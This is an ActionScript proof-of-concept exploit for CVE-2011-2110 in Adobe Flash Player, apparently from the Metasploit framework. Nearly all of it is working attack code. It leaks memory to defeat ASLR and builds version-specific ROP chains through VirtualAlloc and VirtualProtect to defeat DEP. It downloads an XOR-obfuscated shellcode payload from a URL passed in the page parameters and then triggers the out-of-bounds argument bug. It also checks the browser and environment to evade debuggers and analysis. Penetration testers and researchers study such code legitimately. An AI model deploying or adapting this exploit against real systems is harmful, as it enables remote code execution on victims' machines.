metasploit-framework/external/source/exploits/CVE-2011-2110/CVE-2011-2110.as

559 lines
20 KiB
ActionScript

/*
* poc exploit for CVE-2011-2110
* thanks to AR Team (http://www.accessroot.com/arteam/site/download.php?view.331)
* modified & verified safe code by mr_me - steventhomasseeley@gmail.com
* bypasses aslr/dep
* tested against IE/FF under WINXP/VISTA/WIN7
* 19/6/2012
*/
package
{
import flash.display.*;
import flash.events.*;
import flash.external.*;
import flash.net.*;
import flash.system.*;
import flash.utils.*;
// Main class
public class Main extends MovieClip
{
public var content:ByteArray;
public var pobj:uint;
public var code:ByteArray;
public var baseaddr:uint;
public var content_len:uint;
public var xchg_eax_esp_ret:uint;
public var xchg_eax_esi_ret:uint;
public var pop_eax_ret:uint;
public var VirtualAlloc:uint;
public var jmp_eax:uint;
public var pop_ecx:uint;
public var mov_eax_ecx:uint;
public var inc_eax_ret:uint;
public var dec_eax_ret:uint;
public var to_eax:uint;
public var virtualprotect:uint;
// Main function
public function Main()
{
var i:uint;
var loader:URLLoader;
var onLoadComplete:Function;
// callback called when the download event is complete
onLoadComplete = function (event:Event) : void
{
content = loader.data;
i = 0;
while (i < content.length)
{
// every byte of the file is XORed with 122
content[i] = content[i] ^ 122;
var _loc_4:* = i + 1;
i = _loc_4;
}
// then, the data is decompressed using zlib
content.uncompress();
content_len = content.length;
var _loc_2:* = new ByteArray();
code = _loc_2;
_loc_2.position = 1024 * 1024;
_loc_2.writeInt(2053274210);
_loc_2.writeInt(2053339747);
_loc_2.writeInt(2053405283);
_loc_2.writeObject(_loc_2);
exploit(_loc_2, _loc_2);
// needed for stack alignment
trace(_loc_2.length);
return;
}
var param:* = root.loaderInfo.parameters;
// Reads the "info" parameter from the HTML page
var t_url:* = this.hexToBin(param["info"]);
// Decode the URL in the "info" parameter
while (i < t_url.length)
{
t_url[i] = t_url[i] ^ 122;
i = (i + 1);
}
// Decompress the data using zlib
t_url.uncompress();
// setup the error
var error_arr:* = new ByteArray();
error_arr.writeByte(2053208673);
error_arr.writeObject(error_arr);
// Takes the userAgent from the request
var browser:* = ExternalInterface.call("eval", "navigator.userAgent");
// we only target IE and FF...
if (!(browser.toLowerCase().indexOf("msie") > 0 || browser.toLowerCase().indexOf("firefox") > 0))
{
// Error!
error_arr.uncompress();
}
// If it is a 64 bits process or is embedded in a PDF or if the Flash version is an un-official version (debug version)
// http://help.adobe.com/en_US/AS2LCR/Flash_10.0/00000896.html
if (Capabilities.isDebugger || Capabilities.supports64BitProcesses || Capabilities.isEmbeddedInAcrobat)
{
// Error!
error_arr.uncompress();
}
// Create the URLDownloader object
var url_str:* = String(t_url);
loader = new URLLoader();
loader.dataFormat = URLLoaderDataFormat.BINARY;
loader.addEventListener(Event.COMPLETE, onLoadComplete);
loader.load(new URLRequest(t_url.toString()));
return;
}
// Converts from an hex string to binary representation
public function hexToBin(param1:String) : ByteArray
{
var _loc_2:String = null;
var _loc_3:* = new ByteArray();
var _loc_4:* = param1.length;
var _loc_5:uint = 0;
_loc_3.endian = Endian.LITTLE_ENDIAN;
while (_loc_5 < _loc_4)
{
_loc_2 = param1.charAt(_loc_5) + param1.charAt((_loc_5 + 1));
_loc_3.writeByte(parseInt(_loc_2, 16));
_loc_5 = _loc_5 + 2;
}
return _loc_3;
}
// the exploitation function
public function exploit(... args) : void
{
var _loc_8:uint = 0;
// First leak
// this leak gets the baseaddress of Flash10s.ocx
var n1:Number= new Number(parseFloat(String(args[1073741841])));
var _loc_3:* = new ByteArray();
_loc_3.position = 0;
_loc_3.writeDouble(n1);
var _loc_4:* = _loc_3[0] * 16777216 + _loc_3[1] * 65536 + _loc_3[2] * 256 + _loc_3[3];
// Base address
this.baseaddr = _loc_4;
this.code.position = 0;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeInt((this.pobj - 1) + 16 + 1024 * 4 * 100);
this.code.endian = Endian.BIG_ENDIAN;
this.code.writeUnsignedInt(0x41424344);
this.code.writeUnsignedInt(0x41424344);
this.code.writeUnsignedInt(0x45464748);
// With this loop, we store the 0x41414141 in the stack
_loc_8 = 0;
while (_loc_8 < 1024 * 100)
{
this.code.writeUnsignedInt(0x41414141);
_loc_8 = _loc_8 + 1;
}
// Test for the vulnerable versions of Flash
// Different test are done to calculate the ROP gadgets for every vulnerable version
if (Capabilities.version.toLowerCase() == "win 10,3,181,14" || Capabilities.version.toLowerCase() == "win 10,3,181,22" || Capabilities.version.toLowerCase() == "win 10,3,181,23")
{
if (Capabilities.version.toLowerCase() == "win 10,3,181,14")
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
this.xchg_eax_esp_ret = this.baseaddr - 4147053;
this.xchg_eax_esi_ret = this.baseaddr - 3142921;
this.pop_eax_ret = this.baseaddr - 4217672;
this.VirtualAlloc = this.baseaddr + 681970 + 52;
this.jmp_eax = this.baseaddr - 4189983;
this.pop_ecx = this.baseaddr - 4217760;
this.mov_eax_ecx = this.baseaddr - 3903324;
this.inc_eax_ret = this.baseaddr - 4217676;
this.dec_eax_ret = this.baseaddr - 3914790;
this.to_eax = this.baseaddr - 3857175;
this.virtualprotect = this.baseaddr + 681970;
}
if (Capabilities.playerType.toLowerCase() == "plugin")
{
this.xchg_eax_esp_ret = this.baseaddr - 4070001;
this.xchg_eax_esi_ret = this.baseaddr - 3066633;
this.pop_eax_ret = this.baseaddr - 4140104;
this.VirtualAlloc = this.baseaddr + 681682;
this.jmp_eax = this.baseaddr - 4112415;
this.pop_ecx = this.baseaddr - 4140192;
this.mov_eax_ecx = this.baseaddr - 3826124;
this.inc_eax_ret = this.baseaddr - 4140108;
this.dec_eax_ret = this.baseaddr - 3988570;
this.to_eax = this.baseaddr - 3779959;
this.virtualprotect = this.baseaddr + 681434;
}
if (!(Capabilities.playerType.toLowerCase() == "plugin" || Capabilities.playerType.toLowerCase() == "activex"))
{
this.code.uncompress();
}
}
if (Capabilities.version.toLowerCase() == "win 10,3,181,22")
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
this.code.uncompress();
}
if (Capabilities.playerType.toLowerCase() == "plugin")
{
this.xchg_eax_esp_ret = this.baseaddr - 4070081;
this.xchg_eax_esi_ret = this.baseaddr - 3066633;
this.pop_eax_ret = this.baseaddr - 4140184;
this.VirtualAlloc = this.baseaddr + 681602;
this.jmp_eax = this.baseaddr - 4112495;
this.pop_ecx = this.baseaddr - 4140272;
this.mov_eax_ecx = this.baseaddr - 3826412;
this.inc_eax_ret = this.baseaddr - 4140188;
this.dec_eax_ret = this.baseaddr - 3988622;
this.to_eax = this.baseaddr - 3780231;
this.virtualprotect = this.baseaddr + 681354;
}
if (!(Capabilities.playerType.toLowerCase() == "plugin" || Capabilities.playerType.toLowerCase() == "activex"))
{
this.code.uncompress();
}
}
if (Capabilities.version.toLowerCase() == "win 10,3,181,23")
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
this.xchg_eax_esp_ret = this.baseaddr - 4147431;
this.xchg_eax_esi_ret = this.baseaddr - 3143049;
this.pop_eax_ret = this.baseaddr - 4218184;
this.VirtualAlloc = this.baseaddr + 681510;
this.jmp_eax = this.baseaddr - 4190495;
this.pop_ecx = this.baseaddr - 4218272;
this.mov_eax_ecx = this.baseaddr - 3903692;
this.inc_eax_ret = this.baseaddr - 4218188;
this.dec_eax_ret = this.baseaddr - 3915158;
this.to_eax = this.baseaddr - 3857511;
this.virtualprotect = this.baseaddr + 681458;
}
if (Capabilities.playerType.toLowerCase() == "plugin")
{
this.code.uncompress();
}
if (!(Capabilities.playerType.toLowerCase() == "plugin" || Capabilities.playerType.toLowerCase() == "activex"))
{
this.code.uncompress();
}
}
}
else
{
this.code.uncompress();
}
// rop
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.inc_eax_ret + 1));
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.pop_ecx);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.xchg_eax_esp_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.xchg_eax_esi_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.pop_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.VirtualAlloc);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.jmp_eax);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.pop_ecx);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(0);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(131072);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(4096);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(64);
this.code.endian = Endian.BIG_ENDIAN;
this.code.writeUnsignedInt(2421721856);
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.mov_eax_ecx);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.pop_ecx);
this.code.endian = Endian.BIG_ENDIAN;
this.code.writeUnsignedInt(1435233421);
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.mov_eax_ecx);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.pop_ecx);
this.code.endian = Endian.BIG_ENDIAN;
this.code.writeUnsignedInt(1074135008);
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.mov_eax_ecx);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.inc_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.dec_eax_ret);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.to_eax);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(this.virtualprotect);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(131072);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(64);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.pobj - 1) + 4);
this.code.endian = Endian.BIG_ENDIAN;
// previous pe loader stub removed, just to be safe
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
this.code.writeUnsignedInt(0x90909090);
// shellcode
this.code.endian = Endian.BIG_ENDIAN;
this.code.writeBytes(this.content, 0, this.content.length);
// Second leak
var _loc_5:Number = new Number(parseFloat(String(args[0x3FFFFFAD])));
var _loc_6:* = new ByteArray();
_loc_6.position = 0;
_loc_6.writeDouble(_loc_5);
var _loc_7:* = _loc_6[0] * 16777216 + _loc_6[1] * 65536 + _loc_6[2] * 256 + _loc_6[3];
this.pobj = _loc_7;
_loc_8 = 0;
this.pobj = this.pobj + 0x37;
// with this loop, we store a reference for the leaked address in the stack
_loc_8 = 0;
while (_loc_8 < 100)
{
this.code.writeInt(this.pobj);
_loc_8 = _loc_8 + 1;
}
// third leak
var _loc_9:Number = new Number(parseFloat(String(args[0x3FFFFFB9])));
var _leak_3:* = new ByteArray();
_leak_3.position = 0;
_leak_3.writeDouble(_loc_9);
_loc_4 = _leak_3[0] * 16777216 + _leak_3[1] * 65536 + _leak_3[2] * 256 + _leak_3[3];
this.pobj = _loc_4 + 2;
// dont remove, the stack will change
ExternalInterface.call("", "");
// again, a reference to the leaked address is stored in the stack
_loc_8 = 0;
while (_loc_8 < 100)
{
this.code.writeInt(this.pobj);
_loc_8 = _loc_8 + 1;
}
this.code.position = 0;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeInt((this.pobj - 1) + 16 + 1024 * 4 * 100);
this.code.endian = Endian.BIG_ENDIAN;
this.code.position = 409872;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(131072);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt(64);
this.code.endian = Endian.BIG_ENDIAN;
this.code.endian = Endian.LITTLE_ENDIAN;
this.code.writeUnsignedInt((this.pobj - 1) + 4);
this.code.endian = Endian.BIG_ENDIAN;
// This is the trigger.
Number(args[0x3FFFFFB9]);
return;
}
}
}